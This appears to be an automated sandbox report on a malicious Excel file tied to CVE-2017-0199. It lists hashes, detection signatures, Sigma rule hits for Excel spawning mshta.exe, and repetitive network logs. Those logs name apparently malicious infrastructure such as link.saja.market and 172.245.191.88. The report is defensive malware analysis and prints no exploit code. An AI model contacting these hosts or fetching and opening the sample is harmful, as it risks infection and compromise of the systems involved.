Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Overview

General Information

Sample name:	SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx
Analysis ID:	1636191
MD5:	f70e63b415e06294c4a4d0297166ae32
SHA1:	34b45ced7f155ec3c5f835a1cba69f0fc83660eb
SHA256:	7479a3b015ea50100be27c4bda29ec946f21448cbdbf0f1f1eab4aa30168ada5
Tags:	xlsxuser-SecuriteInfoCom
Infos:

Detection

Score:	60
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Sigma detected: Suspicious Microsoft Office Child Process

Detected non-DNS traffic on DNS port

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Unable to load, office file is protected or invalid

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w11x64_office

EXCEL.EXE (PID: 2432 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)

mshta.exe (PID: 7960 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)

splwow64.exe (PID: 8032 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)

EXCEL.EXE (PID: 2572 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)

cleanup

Sigma Signatures

System Summary

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 2432, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 7960, ProcessName: mshta.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 3.39.89.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 63570

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 63570, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2432, Protocol: tcp, SourceIp: 3.39.89.152, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	ReversingLabs: Detection: 23%
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	Virustotal: Detection: 28%			Perma Link

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 2.22.242.113:443 -> 192.168.2.24:63582 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Source: global traffic	DNS query: name: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS query: name: 197.87.175.4.in-addr.arpa
Source: global traffic	DNS query: name: link.saja.market
Source: global traffic	DNS query: name: otelrules.svc.static.microsoft

Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global traffic	TCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
